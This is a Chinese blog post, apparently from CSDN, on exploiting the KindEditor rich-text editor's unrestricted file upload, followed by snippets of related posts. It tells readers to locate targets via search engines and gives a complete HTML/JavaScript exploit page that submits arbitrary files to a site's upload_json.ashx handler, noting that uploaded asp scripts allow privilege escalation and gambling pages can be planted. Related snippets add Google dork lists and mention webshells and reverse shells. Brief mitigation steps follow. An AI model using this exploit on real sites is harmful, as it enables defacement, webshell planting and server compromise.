利用KindEditor漏洞上传网马

最新推荐文章于 2025-03-14 16:19:13 发布
最新推荐文章于 2025-03-14 16:19:13 发布
阅读量1w 收藏
点赞数
分类专栏: kindeditor漏洞 文章标签: kindeditor漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_28984567/article/details/94303196
版权

       KindEditor是常用的富文本编辑器,里边有上传的功能,如果上传文件类型控制的不好,可能就会给网站带来安全问题,比如上传了网马,可能对我们的服务器就造成了伤害。

       首先通过搜索引擎查到使用kindeditor的位置,比如http://xxxx/editor/ ,然后编写上传文件代码,例如:

<html>
<head>
    <title>kindeditor exploit</title>
    <script src="~/Content/editor/kindeditor-min.js"></script>
    <script>
        KindEditor.ready(function (K) {
            var uploadbutton = K.uploadbutton({
                button: K('#uploadButton')[0],
                fieldName: 'imgFile',
                url: 'http://xxxx/editor/asp.net/upload_json.ashx?dir=file',
                afterUpload: function (data) {
                    if (data.error === 0) {
                        var url = K.formatUrl(data.url, 'absolute');
                        K('#url').val(url);
                    }
                },
            });
            uploadbutton.fileBox.change(function (e) {
                uploadbutton.submit();
            });

        });

    </script>
</head>
<body>

    <div class="upload">
        <input type="button" id="uploadButton" value="Upload" />
    </div>
</body>
</html>

       效果如下:    

   

       选择测试文件:

       我们可以看到文件已经上传了,然后浏览器输入文件路径地址,就可以看到上传的文件内容了,如果可以上传asp等可执行脚本文件,就可以提权了,即使上传html等博彩页面也很让人难受。

       解决办法就是控制上传文件类型,设置文件夹权限,不能执行,只能读取等。具体如下:      
       1、删除Kindeditor对应文件夹下的demo.aspx; 
       2、修改file_manager_json和upload_json中允许文件上传类型,去掉可执行文件、html、htm等文件类型;
       3、修改file_manager_json和upload_json两个文件名称,全局搜索两个文件名并对应修改程序调用名称。

 

 

(CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞
XZ_______的博客
04-22 1320
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中。
文件上传漏洞利用
m0_61506558的博客
10-09 1640
基于靶场的练习,决定把文件上传漏洞再进行总结,整体可以分为中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞和其他,由于本人水平有限,如有问题,请师傅留言,一起进步!!!(一)基本介绍不理解漏洞原理的,可以看看下面文章哈文件上传漏洞__Cyber的博客-CSDN博客_常见的文件上传漏洞(二)利用思路对文件上传类型进行区分,是属于编辑器文件上传,还是属于第三方应用,还是会员中心。要确保文件上传是什么类型,就用什么类型方法对它进行后期的测试。
kindeditor上传漏洞复现(CVE-2017-1002024)
qq_34853514的博客
08-09 4077
漏洞简介 漏洞编号: CVE-2017-1002024 漏洞详情: KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在站上获得所见即所得编辑效果,在于小于等于kindeditor4.1.12 编辑器里,可以上传.txt和.html文件,支持php/asp/jsp/asp.net。 漏洞影响范围: kindeditor<=4.1.11 漏洞原理: upload_json.*中代码并没有对用户上传的文件格式,以及大小进行安全检测,导致用户可以伪造恶意文件进行上传,尤其html文件可以
Kindeditor 漏洞导致站被植入木文件的解决办法
05-11 1176
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使...
记一次解析漏洞渗透经历,从零基础到精通,收藏这篇就够了!_kindeditor漏洞
bdfcfff77fa的博客
03-14 343
看了下端口 14147 也开放,看了 FileZilla Server Interface.xml 文件我们可以看到它的连接地址:127.0.0.1 及端口:14147,密码这里为空。前面的 1234 是本机连接用的端口,中间的 ip 地址是目标服务器的(可以是 webshell 所在服务器也可以是和它同内的服务器),后面的 14147 是欲连接目标服务器的端口。然后我去看了一下他主站是一个 asp 的站,跟这个域名同一台,然后上传了一个 asp 一句话,成功执行了命令。
KindEditor文件上传漏洞(CVE-2018-18950)
m0_65150886的博客
01-03 3824
漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。/php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。1.直接删除upload_json.和file_manager_json.即可。​​​​​​​6.访问html文件如下。7.抓包,上传txt文件,获取返回路径。8.访问上传文件,发现成功上传
KindEditor 文件上传漏洞漏洞
热门推荐
mei_13的博客
07-31 1万+
1 漏洞简介 1.1 漏洞描述 KindEditor是一套开源的HTML可视化编辑器,使用JavaScript编写,支持asp、aspx、php、jsp,几乎支持了所有的站,该编辑器主要用于让用户在站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联应用上使用。且该编辑器支持上传功能,如果上传文件类型控制的不好,那么我们就能利用漏洞上传doc,docx,xls,xlsx,ppt,h
站安全检测被 提示该站内容被禁止访问
网站安全专家
05-11 1847
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使用以及编辑上传方面得到了很多用户的喜欢。 前端时间我们SINE安全对其进行全面的漏洞检测的时候发现,Kindeditor存在严重的上传漏洞,很多公司站,以及事业单位的...
Kindeditor上传漏洞复现(CVE-2017-1002024)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-09 3688
Kindeditor上传漏洞复现(CVE-2017-1002024) 文章目录Kindeditor上传漏洞复现(CVE-2017-1002024)1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见 复现环境土豪专用下载链接 https://download.csdn.net/download/qin9800/18510863 1. 漏洞简述 漏洞名称:Kindeditor上传漏洞 漏洞编号:CVE-2017-1002024 漏洞影响:黑页、钓鱼、XSS等 基础权限
kindeditor文件上传反弹shell
最新发布
04-03
嗯,用户想了解KindEditor文件上传漏洞导致反弹shell的原理和防御措施。首先,我得回忆一下KindEditor这个编辑器,它以前挺流行的,但可能存在一些安全漏洞,特别是文件上传部分。文件上传漏洞通常是因为没有对上传...
kindeditor编辑器<=4.1.5上传漏洞复现
p_utao的博客
12-11 1233
前期 谷歌语法搜索 inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ 首先一定要看脚本语言,对症下药 /asp/upload_json.asp /asp.net/upload_json.ashx /
KindEditor 4.1.11站实例
03-07
KindEditor是非常好的富媒体文本编辑系统,短小精悍,可惜上找到的都是有各种问题!一怒之下,我自己进行了修改和配置,搞成了一个站示例.下载解压后,可以直接运行!!完全无问题.! Kindeditor版本好像官方2012年之后就不更新了,官方最新的为 KindEditor 4.1.1 (2012-06-10), ,我这个站里的是从qq群里下载的 标明的版本为4.1.11
UploadButton:UploadButton 是一个用于自定义样式上传按钮的小模块。 使用 HTML5 的自定义元素 API 和 Shadow DOM 进行封装
06-29
上传按钮 Heroku : 要求 UploadButton使用和 ,目前这需要尖端浏览器,例如 。 入门 满足您可以开始将UploadButton HTML 添加到您的 DOM 中: < button is =" upload-button " > Upload File </ button > 模块中的registerElement调用将注册类型扩展自定义元素HTMLButtonElement.prototype upload-button HTMLButtonElement.prototype作为HTMLButtonElement.prototype的扩展,这意味着没有任何样式,元素将显示为普通按钮——但点击元素将调用文件选择模式。 属性 通过将应用于button元素,这些将自动转发到用于上传文件的input元素。 accept ,默认为* autofocus ,
Ueditor、FCKeditor、Kindeditor编辑器漏洞
网安君的博客
01-27 6934
UEditor是由百度web前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。Ueditor、FCKeditor、Kindeditor编辑器漏洞
ueditor富文本编辑器上传图片或木文件漏洞
美奇软件开发工作室
04-27 1834
ueditor插件目录一般都自带index.html文件(完整demo文件),这个文件原来是用来测试插件功能的,但。插件目录下的index.html文件,删除不影响ueditor富文本编辑器的正常功能;
kindeditor老版本version 4.1.10 bug踩坑
weixin_30750335的博客
11-16 1962
目录 上传图片或者视频的弹窗有时候不出现,只出现遮罩 视频上传无法播放的问题 参考链接: 问题目录 上传图片或者视频的弹窗有时候不出现,只出现遮罩 通过测试发现,出现这种情况不是弹出框没有出现,而是设置固定定位top值为空,元素出现在了屏幕之外(屏幕下边); 查看E...
kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor<=4.1.5 文件上传漏洞利用...
weixin_26820341的博客
08-11 1229
kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerabilityanduse漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器漏洞影响:上传任意. txt 和. html 文件漏洞存在动态脚本语言:php/asp/jsp/asp.net漏洞存在的证明文件:upload_json.* 具体...
文件上传之解析漏洞与waf绕过
m0_61786761的博客
08-01 569
访问https//your.ip8080/upload/a.jpg并抓包修改为info.jpg..php,在hex中修改.jpg后面两个点2e为20,00,再访问。上传各类文件,如.jpg,访问时加斜杠加以.php结尾的任意名字,会把.jpg结尾的文件以php执行。原理x.php.xxx.yyy->识别最后的yyy,如果识别失败则向前解析,直到识别为止。判断是否有漏洞址后加上任意以.php结尾的名字,报错就就没有,显示地址就有这个漏洞。访问xx/a.jpg/x.php。...
kindeditor编辑器文件上传漏洞
shy的博客
03-12 4117
kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用漏洞上次页、文本文件,可站进行篡改,添加赌博、反共等违法信息。 通过扫描器发现该站存在编辑器。 通过浏览器访问,确定该编辑器为kindeditor编辑器。 确定该编辑器的版本小于4.1.5,存在文件上传漏洞。 构造文件上传漏洞利用脚本kindeditor.html。 <html><head> <title>Uploader</title> <s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值